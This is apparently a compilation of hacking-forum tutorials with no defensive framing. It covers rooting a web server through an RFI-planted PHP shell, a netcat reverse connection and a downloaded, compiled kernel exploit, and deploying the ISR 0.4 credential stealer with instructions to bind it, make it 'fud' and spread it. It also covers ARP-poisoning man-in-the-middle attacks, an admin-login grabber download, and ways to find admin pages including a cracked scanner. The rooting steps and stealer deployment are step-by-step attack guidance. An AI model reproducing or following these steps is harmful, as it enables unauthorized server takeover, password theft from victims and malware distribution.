Rooting Tutorial

What we need?
-RFI Vulnerable Script
-PHP Shell
-Netcat
-Brains

First of all, we need to get a shell on a site.
For this tutorial i will be using MulCi Shell.

So, once you have it on a site, go to the 'Backdoor Host' tab and forward a port.

Now, go to the 'Back Connect' tab and insert the following settings:

1- Your IP Address.
2-The port you forwarded.

Now, go on CMD and type in:cd 'Path To Your Netcat.exe' and then you need to make netcat listen to the port you forwarded.To do this, type:nc -l -n -v -p port

It looked like this for me:

Microsoft Windows XP [Version 5.1.2600]
Copyright 1985-2001 Microsoft Corp.

C:\KroKite>cd C:\

C:\>cd WINDOWS

C:\WINDOWS>nc -l -n -v -p 4444
listening on [any] 4444 ...

Now, when you have netcat listening to the port you forwarded, click 'Connect'.

When your connected, type 'whoami'.You shouldnt have root.

Now, to find an exploit to root the box, you need to know whats the kernel version.To do this, just type 'uname -a'.

It should look something like this:

Code:

Linux linux1.dmehosting.com 2.6.17-92.1.10.el5PAE #1 SMP Tue Aug 5 0805 EDT 2008 i686

Now, we go on exploit-db.com and we will look for '2.6.17'.

Code:

hhttp://www.exploit-db.com/exploits/5092/

Now, we type 'wget http://www.exploit-db.com/exploits/5092/ on the netcat window.

Code:

wget http://xpl_url.com

So the exploit works, you must compile it in the server(gcc) and execute it via exploit(-o).

To do this we type 'gcc 5092 -o exploit'.

Code:

gcc 5092 -o exploit

5092- After the url path.http://www.site.com/5092.
exploit- Output name.


Now you can execute your exploit by typing './exploit'

Wait for the exploit to finish running and type root again.

It should output in something like this:

Code:

uid=0(root) gid=0(root) groups=500(apache)

This means you have successfully rooted the box .

ISR Stealer Tutorial

ISR 0.4
1.Stealers
What is Stealer?
Stealer is basically used for steal the saved cookies in browsers. It only steal The saved Passwords in browsers eg.IE, chrome, firefox, And any massangers.
Tools to use
• IS 6.0 ,6.3
• ISR 0.4 
These are mainly used tools to steal the passwords.
We seen many stealers like istealer6.0 or something like that but now in this these tools are not in use bcoz we seen in logs username password is same. So we can use this upgraded version that is CALLED ISR 0.4 that is ultimate stealer to use..so use this tool to hack the password.
Here Is the tutorial to use it.
What you Need to use it.
1. Domain
2. Hosting
3. My SQL Database
4. Tools eg.ISR 0.4
1.Domain
Purchase a domain or free Doamin’s are also available.
Eg.www.example.com
2.HOSTING
Then you Want Hosting. Hosting is a web space that is used for host your website there with your domain name.
3.My SQL database
That is used to store web site information like blog posts or user information. A MySQL database is the most popular type of relational database on the web today.
4.Tools
That tools is our main part to steal the cookies from victims.
SO let’s start..
First purchase a domain and hosting accoung. OR it’s available in free also.
I am doing this with free domain and free hosting.
Here you go.
1. Go to http://000webhost.com
2. Sign up there with free order.
3. After creating your hosting and domain Go to your cpanel.
After that Create My SQL Database .
1. GO to SQL Database


2. Create a database and one database user account.



3. After creating Database save this information.



• $dbHost = "fdb-1-5.cwahi.net"; //

(1)MySQL host
• $dbUser = "username"; // (3)MySQL username
• $dbPass = "password"; // (4)MySQL password
• $dbDatabase = "username_db1"; // (2)MySQL database name
Then back to cpanel after that
1. Go to file manger.



2. Here you want go in public_html



3. Here you want to upload some files of our tools that is in PHP 

language.



WE are using ISR 0.4

So it’s files are.
• Config.php
• Install.php
• Index.php
• Style.css
So upload these files in your directory.
After that go to your directory .
1. Click on config.php
2. Click on edit.



3. Here is window opend.
4. Edit in config.php
• $dbHost = "fdb-1-5.cwahi.net"; // (1)MySQL host
• $dbUser = "username"; // (3)MySQL username
• $dbPass = "password"; // (4)MySQL password
• $dbDatabase = "username_db1"; // (2)MySQL database name
5. Replace these information with your databse information that is you are saved on your pc.
6. In next fields you can see usename password select your username and password. That is required when you want to show your logs.
7. Then click on save and go back to directory.



Then go your Domain name eg.www.example.com

1. Then type in url: http://www.example.com/install.php
2. Then click on INSTALL

3. After install delete install.php from your hosting.
Here is everything is done with hosting and domain. 
1. Go to your tool That is ISR0.4.exe
2. Open it in url field paste your domain name link here.
Eg. http://www.example.com/index.php
3. Then click on Bulid Serve



4. After bulid server bind your file with Anything and make a fud.
5. Spread it….And enjoy it…
6. TO show your logs go to your domain eg.http://www.example.com/index.php
7. Login there with your usename password.
If YOu Wnat to download these all files which You Links is Here.

DOWNLOAD

source : http://anonymouseverywhere.blogspot.com 

Introduction to ARP – Poisoning

ARP stands for Address Resolution Protocol. ARP acts as a layer over the Internet Protocol address (IP) and converts it into a Media Access Control address (MAC address) or Ethernet Hardware Address (EHA). Understanding the concept of ARP is very important for a hacker because, a potential hacker will be able to poison the network and steal the information running between two servers. Hence he can execute a ‘Man-In-The-Middle‘ attack using a simple ARP poisoning tool such as Cain & Abel. The function of Cain & Abel is similar to a packet sniffer.

MAC address is a unique identification address for network nodes, such as computers, printers, and other devices on a LAN.  MAC addresses are associated to network adapter that connects devices to networks.  The MAC address is critical to locating networked hardware devices because it ensures that data packets go to the correct place.  ARP tables, or cache, are used to correlate network device’s IP addresses to their MAC addresses.

How it works?

Consider you want the phone number of a person whose name is already known to you. In that case you will checkout your telephone book and if the number is not available the you will call the phone service and request him the number. Here the telephone directory act as ARP tables and the phone service as ARP. ARP tables give the list of addresses of computers which are connected to that system inside the network.

What is ARP poisoning?

If a system(say System 1) requests to connect to another system(System 2) inside the network, then System 2 checks the entry of the System 1 in its ARP tables and if the entry is not present then it is automatically added in System 2′s ARP tables. The weakness of the ARP is that, it cannot identify if a person request to connect with it showing a another address. Therefore a hacker can easily poison this network, that is, a potential hacker if sends a request to connect to System 2 showing the IP address of System 1 then he can access the network of System 1 associated with System 2! So he will be able to obtain the information passing between them. That is, there is another path executed between the System 1 and System 2.

Suppose, if a hacker has poisoned a path between social networking site and a victim’s system then he would be able to steal the information passing between them, like username and password etc.

So here, in this case the phone service is calling you and giving you the number, even though you haven’t requested it! (Scenario mentioned above)

The concept of ARP with a simple example:

The attacker: 10.0.0.1
MAC address: 00-AA-BB-CC-DD-00
The victims: 10.0.0.2
MAC address: 00-AA-BB-CC-DD-E1
Fake address:10.0.0.3
MAC address: 00-AA-BB-CC-DD-E2

A potential hacker sends a packet (request to connect) to 10.0.0.2 with spoofed IP of  10.0.0.3 and then it sends a crafted package to 10.0.0.3 with  spoofed IP of 10.0.0.2 with his own IP. This means that both victims think they can find each other at the MAC address of the attacker. This is known as Man-In-The-Middle attack

Now all the traffic between those 2 hosts will go through the attacker first. So this means that the attack will need to reroute the packets to the real destination else you get a DOS on the network and there will be no traffic possible. Also remember that the ARP tables get updated so if during a long period of time there is no ARP poisoning the entries will be deleted and you won’t be able to sniff until you start poisoning again.

Admin login grabber by albdevil

This is my Admin login Grabber.it use WebRequest so its gets response faster.
It uses the bigest dork list ever so enjoy.
If u have your own dorklist u can add to albdevil.txt



Very easy to use:
1)just put your target
2)Click Grabb
3)then result will show up
4)just click on the result link and it will open automactlly
5)Enjoy
6)Give thanks if u liked it

Dont delete the albdevil.txt because without that it doesnt work.
U must have netframe4 installed to open it.

Virusscan: https://www.virustotal.com/file/a44e...is/1339843233/
Download: http://localhostr.com/WYnUQKqCgLDX

Finding Admin page [90% guarantee]

Hey everyone. There are so many people wondering how to find an admin page. I myself when I was just beginning web-hacking, started with SQL Injection. As many of you would've done as well. The problem is, you can barely ever find the proper admin page. Either you can't find it, or it won't work.

First of all, I'd like to get this through EVERYONE's head. There is a difference between a CPANEL Login, and a ADMIN Login. The cpanel login is to manage EVERYTHING on the site. You have access to FTP and everything. Unless the admin is VERY VERY VERY stupid (Which is probably likely, but still this is rare) you will not have the same credentials as the CPanel. So don't even both trying that login.
In a website, the webmaster will usually create a standard admin page, for the admins to manage everything easier.
Now. Let's start listing our possibilities.
 
GUESSING
This is by far the most popular way of finding an admin page. A lot of people just guess what the admin page is. Most of the time, there will either be a directory OR a file. Here is an example of a directory, and then a file:
DirectoryCode:http://www.site.com/admin/

FileCode:http://www.site.com/admin.php

A directory can contain other files, but a file is just one thing.
A lot of the time, the admin page is simply just "Admin". So you can try adding: /admin to the end of site's URL. If you get a 404 Error (Which usually means the files does not exist) then that's not right. After I try "admin", I usually try a different method. This one is probably my favorite.
 
ROBOTS.TXT
What is Robots.txt? Robots.txt is a file that makes sure scanners will not be able to scan certain pages. Usually, if they don't want a scanner to find something, it's for a certain reason right? Obviously it's an important file. So sometimes they will have the admin page listed in there. This is what a Robots.txt page looks like:
 
Code:User-Agent: *Disallow: /moderation.phpDisallow: /ratethread.phpDisallow: /report.phpDisallow: /reputation.phpDisallow: /sendthread.phpDisallow: /usercp.phpDisallow: /usercp2.phpDisallow: /newreply.phpDisallow: /newthread.phpDisallow: /editpost.phpDisallow: /private.phpDisallow: /search.phpDisallow: /refer.phpDisallow: /myawards.phpDisallow: /stats.phpDisallow: /member.phpDisallow: /memberlist.phpDisallow: /showteam.phpDisallow: /upgrade.phpDisallow: /showratings.php User-agent: dotbotDisallow: / User-agent: 008Disallow: /

Even if it says "Disallow" we can usually still access the files. So go ahead and add /robots.txt to your target, and see what you find!
 
WEB-CRAWLER
Web crawlers are, and always will be, a hackers best friend. A web-crawler will crawl a website, and list certain directories and files. I DEFINITELY recommend Acunetix. Acunetix is definitely one of the best Web-Crawlers out there, don't even bother trying to say different.
Even Robots.txt won't stop Acunetix's web-crawler (Which is very important if we actually want to get at useful files).
 
SUBDOMAINS
If the webmaster is smart, they will sometimes use sub-domains to hide certain admin-pages, or even files. You can tell what they may, or may not have open if you scan the ports with Nmap. Nmap will list the open ports of the website. If it has an SMTP port open, that may mean you can access an email login. Which may or may not contain valuable information.
Again, you can use Acunetix to check for subdomains. I don't have any cracks for acunetix (That I've posted) but I have seen some here on HF. I might (at some point) post a crack, and an easy one so you don't have to replace files and shit.
 
FTPWhat is FTP? FTP stands for "File Transfer Protocol". If you have access to FTP, you can do absolutely anything you want. Unfortunately, you will not have permissions, unless you supply a username and password. But sometimes the FTP will be WIDE open for you to see. Sometimes they'll list the admin page in there. To gain access to the FTP, you can either do:
Code:ftp.site.comor
Code:http://www.site.com:21

Why did I just add a ":21" to the end of the site? Because 21 is the port for FTP. If I do :21, it'll connect to the port I have put after the ":". This is a very useful method, and I definitely recommend it.

SCANNER
Scanners are programs that will connect to the internet, and test certain pages of your website.
If you're looking for another program that will scan, and you're looking for a very simple to use one, you can check out "Havij". I do not support the SQL Injection methods with it, because it's pretty "nooby". But using it to find Admin Pages is completely acceptable.

GOOGLE DORKS
Google dorks are keywords you can use to search for exact things. Like this:
Code:inurl:admin.phpThat will look for any site that has admin.php in it. I usually use these dorks if I'm looking for an admin page.

Code:
site:site.com inurl:adminsite:site.com intext:loginsite:site.com intext:adminsite:site.com intitle:loginsite:site.com intitle:admin 
Those should help! Well, that's pretty much it. Thanks for reading the tutorial, and I hope this helps you out! These methods are extremely useful, I find admin pages A LOT with these methods, don't doubt them until you try them.Thanks!